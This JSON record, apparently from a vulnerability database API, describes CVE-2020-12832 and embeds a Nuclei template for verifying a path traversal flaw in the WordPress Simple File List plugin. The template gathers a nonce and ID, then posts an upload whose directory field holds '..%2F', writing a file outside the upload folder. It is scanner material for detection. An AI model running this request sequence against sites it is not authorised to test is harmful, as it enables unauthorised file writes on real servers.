{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-12832/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-12832/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-12832/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-12832/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-12832/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-12832"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-12832"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-12832.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2020-12832\n\ninfo:\n  name: WordPress Simple File List - Path Traversal\n  author: riteshs4hu\n  severity: critical\n  description: |\n    Simple File List plugin allows path traversal via file upload, enabling files to be written outside the upload directory.\n  impact: |\n    Attackers can delete arbitrary files on the server, potentially causing data loss or service disruption.\n  remediation: |\n    Update to version 4.2.8 or later.\n  reference:\n    - https://wpscan.com/vulnerability/422360b9-4c70-4fd9-9833-375f1294bd7a/\n    - http://nvd.nist.gov/vuln/detail/CVE-2020-12832\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-12832\n    epss-score: 0.07073\n    epss-percentile: 0.93935\n    cwe-id: CWE-22\n    cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: Simple File List\n    product: Simple File List WordPress Plugin\n  tags: cve,cve2020,wp,wordpress,wp-plugin,traversal,simple-file-list,lfi,vkev,vuln\n\nvariables:\n  rand: \"{{rand_base(7)}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /?rest_route=/wp/v2/pages&per_page=100 HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: json\n        name: slug\n        json:\n          - '.[] | select(.content.rendered | contains(\"eeSFL_UploadGo\")) | .slug'\n        internal: true\n\n  - raw:\n      - |\n        GET {{slug}}/ HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: sflnonce\n        group: 1\n        regex:\n          - 'name=\"ee-simple-file-list-upload-nonce\"[^>]*?value=\"([A-Za-z0-9]+)\"'\n        internal: true\n\n      - type: regex\n        name: sflid\n        group: 1\n        regex:\n          - 'id=\"eeSFL_ID\">([0-9]+)'\n        internal: true\n\n      - type: regex\n        name: ext\n        group: 1\n        regex:\n          - 'eeSFL_FileFormats\\s*=\\s*\"([A-Za-z0-9]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytA7kTuCe4IHDaUBZ\n\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"action\"\n\n        sfl_upload_job\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{rand}}.{{ext}}\"\n        Content-Type: application/octet-stream\n\n        {{rand}}\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"eeSFL_ID\"\n\n        {{sflid}}\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"eeSFL_FileUploadDir\"\n\n        wp-content%2Fuploads%2Fsimple-file-list%2F..%2F\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ\n        Content-Disposition: form-data; name=\"ee-simple-file-list-upload\"\n\n        {{sflnonce}}\n        ------WebKitFormBoundarytA7kTuCe4IHDaUBZ--\n\n  - raw:\n      - |\n        GET /wp-content/uploads/{{rand}}.{{ext}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"{{rand}}\")'\n        condition: and\n# digest: 490a0046304402206d546de4d6627f03372d598c5f30894418e82c31b169330468ac76f17ec3ae05022045da0a15d2babdc9ba904601025f9da044361c1f18eb1b81756ed96d5c2b3ffc:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-12832"
}